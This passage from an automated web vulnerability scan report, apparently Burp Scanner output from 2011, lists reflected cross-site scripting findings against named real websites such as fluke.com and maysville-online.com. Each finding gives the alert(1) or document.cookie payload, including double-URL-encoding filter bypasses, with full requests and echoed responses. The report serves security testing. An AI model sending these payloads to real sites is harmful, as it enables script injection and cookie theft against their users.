<a title="del.icio.us" href="http://del.icio.us/post?url=http://www.diethealthclub.com/favicon.ico190f9"><script>alert(1)</script>47bfedf4e79" target="_blank" class="delicious" rel="nofollow">
...[SNIP]...

6.54. http://www.fluke.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fluke.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4def%2522%253balert%25281%2529%252f%252f9b13c6b24ed was submitted in the REST URL parameter 1. This input was echoed as d4def";alert(1)//9b13c6b24ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icod4def%2522%253balert%25281%2529%252f%252f9b13c6b24ed HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fluke.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Set-Cookie: .ASPXANONYMOUS=jOvnhRBAzAEkAAAAMDYzMjJmOGItNTdjYy00ZjE0LWFiZTUtZGMxZjhhODA5MTcwoX4U3QnRpeq2OGYGSX9LdGSmrvA1; expires=Mon, 11-Jul-2011 21:21:39 GMT; path=/; HttpOnly
Content-Length: 69788
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:41:39 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="_ctl0_Head1"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta
...[SNIP]...
<!--
s.pageName="favicon.icod4def";alert(1)//9b13c6b24ed 404";
s.pageType='errorPage';var OmniUserGUID;
function readCookie(c_name) {
var c_start,c_end;
if (document.cookie.length>
...[SNIP]...

6.55. http://www.fluke.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fluke.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89480"%3balert(1)//74e63558e96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89480";alert(1)//74e63558e96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /favicon.ico?89480"%3balert(1)//74e63558e96=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fluke.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Set-Cookie: .ASPXANONYMOUS=tHxqbBBAzAEkAAAAYzk2ZWE3MGYtYTdjZS00ZTcxLWFiYjAtYTRhYjBjYzY0MDkxzQN7HNG7GWuJSfwBnGTGwMu95y41; expires=Mon, 11-Jul-2011 21:20:56 GMT; path=/; HttpOnly
Content-Length: 69809
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:40:57 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="_ctl0_Head1"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta
...[SNIP]...
<!--
s.pageName="favicon.ico?89480";alert(1)//74e63558e96=1 404";
s.pageType='errorPage';var OmniUserGUID;
function readCookie(c_name) {
var c_start,c_end;
if (document.cookie.length>
...[SNIP]...

6.56. http://www.forconstructionpros.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.forconstructionpros.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38d7f<script>alert(1)</script>465149a15ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico38d7f<script>alert(1)</script>465149a15ad HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.forconstructionpros.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:19:49 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 599

<head>
<title>ERROR 404</title>
</head>
<center>
<h1>www.forconstructionpros.com</h1>
<h1><strong>ERROR 404</strong></h1>
</center>
<strong>The URL that you requested, /favicon.ico38d7f<script>alert(1)</script>465149a15ad
could not be found. Perhaps you either mistyped the
URL or we have a broken link.</strong>
...[SNIP]...

6.57. http://www.greatnow.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.greatnow.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 19bcc--><script>alert(1)</script>b85e5b127a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico19bcc--><script>alert(1)</script>b85e5b127a8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:24:16 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from squid2.0catch.com
Connection: close

<script>alert(1)</script>b85e5b127a8
SCRIPT_FILENAME = /home/catch/cgi-bin/parse.pl
SCRIPT_NAME = /favicon.ico19bcc-->
...[SNIP]...

6.58. http://www.greatnow.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.greatnow.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9ddd5--><script>alert(1)</script>7edd33653a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico?9ddd5--><script>alert(1)</script>7edd33653a3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:24:10 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from squid2.0catch.com
Connection: close

<script>alert(1)</script>7edd33653a3=1
REMOTE_ADDR = 192.41.60.75
REMOTE_PORT = 12058
REQUEST_METHOD = GET
REQUEST_URI = /favicon.ico?9ddd5-->
...[SNIP]...

6.59. http://www.healthcarejobsite.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.healthcarejobsite.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ffe89%20style%3dx%3aexpression(alert(1))%200209854a144 was submitted in the REST URL parameter 1. This input was echoed as ffe89 style=x:expression(alert(1)) 0209854a144 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.icoffe89%20style%3dx%3aexpression(alert(1))%200209854a144 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthcarejobsite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404
Cache-Control: private
Content-Length: 20541
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: DidIPLkup=Y; expires=Wed, 04-May-2011 04:00:00 GMT; path=/
Set-Cookie: PORTAL=NEWUSERSITE=&USERSTATEABBR=TX&USERSTATE=TEXAS&HTTPREFERRER=&USERGID=714162536746466581&USERCOUNTRY=US&USERCITY=DALLAS&CookieVersion=2%2E0&PARTNER=HEALTHCAREJOBSITE%2ECOM; expires=Wed, 02-May-2012 04:00:00 GMT; path=/
Set-Cookie: Visitor=NewSessionID=EE3C17B2%2DB880%2D44F3%2DBF5F%2D90B0921267EE; path=/
Set-Cookie: ASPSESSIONIDSSQARRRA=EFGMBJLDLFLNKMCAFBHGFHHI; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:07:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/cs
...[SNIP]...
Jobsite.com&t_pgid=610711554272457396&t_sn=/common/error/checkurl.asp&t_httph=www.healthcarejobsite.com&t_httpurl=/common/error/checkurl.asp&t_httpqs=404;http://www.healthcarejobsite.com:80/favicon.icoffe89 style=x:expression(alert(1)) 0209854a144&t_sgid=748241823514461389&t_ws=COLO-WEB02&t_ugid=714162536746466581&f_ip=173.193.214.243&ud=>
...[SNIP]...

6.60. http://www.healthiertalk.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.healthiertalk.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3aad"><script>alert(1)</script>9679a04c57e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe3aad"><script>alert(1)</script>9679a04c57e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthiertalk.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:32:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESS24200d503af176385808d33f42491be3=30po8icql601pd1jrvvv30b9f4; expires=Thu, 26-May-2011 14:06:09 GMT; path=/; domain=.healthiertalk.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:32:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<link rel="canonical" href="http://www.healthiertalk.com/favicon.icoe3aad"><script>alert(1)</script>9679a04c57e" />
...[SNIP]...

6.61. http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hollywoodpix.net
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 946e9%253balert%25281%2529%252f%252f48748d09025 was submitted in the REST URL parameter 1. This input was echoed as 946e9;alert(1)//48748d09025 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /946e9%253balert%25281%2529%252f%252f48748d09025 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywoodpix.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=8p8i2f4pf0io221g8g4em3r5n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 62108

<html>
<head>
<title>Celebrity Picture Gallery - hollywoodpix.net</title>
<META NAME="Description" CONTENT="Celebrity picture gallery, pictures of top celebrities at ho
...[SNIP]...
<script type='text/javascript'>
                       function blockGalleryNo()
                       {
                           var block = gal_PAGENO.value;
                           F946e9;alert(1)//48748d09025.innerHTML="<b class='galleryBlocked'>
...[SNIP]...

6.62. http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hollywoodpix.net
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dfd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5516ecf1b4 was submitted in the REST URL parameter 1. This input was echoed as 4dfd3"><script>alert(1)</script>d5516ecf1b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /4dfd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5516ecf1b4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywoodpix.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=kqk8t1qm2f6p1dtp39jkdcb5i1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 87473

<html>
<head>
<title>Celebrity Picture Gallery - hollywoodpix.net</title>
<META NAME="Description" CONTENT="Celebrity picture gallery, pictures of top celebrities at ho
...[SNIP]...
<input type='hidden' id='gal_PAGENO' value="4dfd3"><script>alert(1)</script>d5516ecf1b4"/>
...[SNIP]...

6.63. http://www.homegauge.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.homegauge.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f965d<script>alert(1)</script>cfaf1370acb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof965d<script>alert(1)</script>cfaf1370acb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homegauge.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.26
P3P: CP="DSP ALL CUR OUR PUBi BUS NAV COM STA INT PHY DEM UNI ONL"
Set-Cookie: JSESSIONID=abcRFn1u9D6k75Nk7x1_s; path=/
Content-Type: text/html
Date: Tue, 03 May 2011 10:20:38 GMT
Content-Length: 13600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equ
...[SNIP]...
<code>/favicon.icof965d<script>alert(1)</script>cfaf1370acb</code>
...[SNIP]...

6.64. http://www.hymnary.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hymnary.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c92d6<script>alert(1)</script>8a2f59a25fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc92d6<script>alert(1)</script>8a2f59a25fd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hymnary.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:24:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: SESS7ef49f7ffc66adccad7f6b2cfd02eb5b=76e639fcf89a59fc5d9abe79185bf858; expires=Thu, 02-Jun-2011 11:24:46 GMT; path=/; domain=.hymnary.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 11:24:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 8447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
...[SNIP]...
<code>/favicon.icoc92d6<script>alert(1)</script>8a2f59a25fd</code>
...[SNIP]...

6.65. http://www.logicbuy.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.logicbuy.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d073c'%3b61be3f43d3a was submitted in the REST URL parameter 1. This input was echoed as d073c';61be3f43d3a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /favicon.icod073c'%3b61be3f43d3a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.logicbuy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="CAO PSA OUR"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 59559
Expires: Tue, 03 May 2011 10:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:32:49 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=e3uhquzqgsrhndqruftqoj45; path=/; HttpOnly

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var loginurl = '/error.aspx?404;http://www.logicbuy.com:80/favicon.icod073c';61be3f43d3a&login=facebook';
</script>
...[SNIP]...

6.66. http://www.makefive.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.makefive.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc47d"><script>alert(1)</script>e841b7ed957 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icobc47d"><script>alert(1)</script>e841b7ed957 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.makefive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:13:17 GMT
Server: Apache/2.2.11 (Ubuntu)
X-Powered-By: PHP/5.2.6-3ubuntu4.2; Qcodo/0.3.43 (Qcodo Beta 3)
Set-Cookie: PHPSESSID=hgs9m6qq5ee30f0it2nt7gf6j0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: userID=0; expires=Tue, 03-May-2011 12:13:18 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<form method="post" id="shiftCMSPageForm" action="/favicon.icobc47d"><script>alert(1)</script>e841b7ed957">
...[SNIP]...

6.67. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/'+upickemDeals[0][2]+'

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2deb"style%3d"x%3aexpression(alert(1))"57591651e78 was submitted in the REST URL parameter 1. This input was echoed as a2deb"style="x:expression(alert(1))"57591651e78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /appa2deb"style%3d"x%3aexpression(alert(1))"57591651e78/scripts/ajaxModules/'+upickemDeals[0][2]+' HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(document.cookie)//110369244fe&regLink=true&title=&upickemSignup=&limit=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4681924
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:36:00 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 1.2729
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp10
Content-Length: 35430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/appa2deb"style="x:expression(alert(1))"57591651e78/scripts/ajaxmodules/'+upickemdeals[0][2]+'/">
...[SNIP]...

6.68. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/'+upickemDeals[0][2]+'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b31c7"%3b6118f9ecd9e was submitted in the REST URL parameter 1. This input was echoed as b31c7";6118f9ecd9e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /appb31c7"%3b6118f9ecd9e/scripts/ajaxModules/'+upickemDeals[0][2]+' HTTP/1.1
Host: www.maysville-online.com
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00c8fc6'%3balert(document.cookie)//110369244fe&regLink=true&title=&upickemSignup=&limit=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4681420
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 17:36:02 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.7639
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 35372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/appb31c7";6118f9ecd9e/scripts/ajaxmodules/'+upickemdeals[0][2]+'/"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""

...[SNIP]...

6.69. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [bg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/upickemDeal.php

Issue detail

The value of the bg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cba3a'%3balert(1)//ea881ebf66b was submitted in the bg parameter. This input was echoed as cba3a';alert(1)//ea881ebf66b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eeecba3a'%3balert(1)//ea881ebf66b&headerBg=330066&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
